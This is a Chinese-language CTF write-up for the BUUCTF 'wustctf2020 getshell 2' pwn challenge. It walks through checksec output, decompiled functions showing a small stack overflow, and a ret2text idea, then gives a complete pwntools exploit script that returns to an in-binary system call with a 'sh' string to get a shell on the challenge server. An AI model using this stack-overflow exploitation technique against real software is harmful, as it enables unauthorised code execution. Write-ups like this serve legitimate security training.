wustctf2020 getshell 2
# wustctf2020 getshell 2
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/wustctf2020_getshell_2/wustctf2020_getshell_2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
init();
vulnerable();
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
vulnerable函数如下:
ssize_t vulnerable()
{
char buf; // [esp+0h] [ebp-18h]
return read(0, &buf, 0x24u);
}
1
2
3
4
5
6
2
3
4
5
6
shell函数如下:
int shell()
{
return system("/bbbbbbbbin_what_the_f?ck__--??/sh");
}
1
2
3
4
2
3
4
Gadget:
ROPgadget --binary wustctf2020_getshell_2 --string "/sh\x00"
Strings information
============================================================
0x08048670 : sh
1
2
3
4
2
3
4
# 思路分析
目前信息:
vulnerable函数存在溢出点可溢出2个栈帧shell函数提供了system与sh- No canary found
- NX enabled
- No PIE
思路:
ret2text
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/wustctf2020_getshell_2/wustctf2020_getshell_2'
io = remote('node4.buuoj.cn', 29247)
# io = process(pwnfile)
padding = 0x18+4
system_addr = 0x8048529
sh_addr = 0x8048670
# 只能溢出2个栈帧
# 使用plt中的system需要添加一个栈帧为返回地址长度,长度超出了
# 所以这里使用现有的程序中的call system会自动压入返回地址 少去一个栈帧
payload = flat(['a'*padding, system_addr, sh_addr])
io.recv()
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
上次更新: 2022/08/15, 00:29:49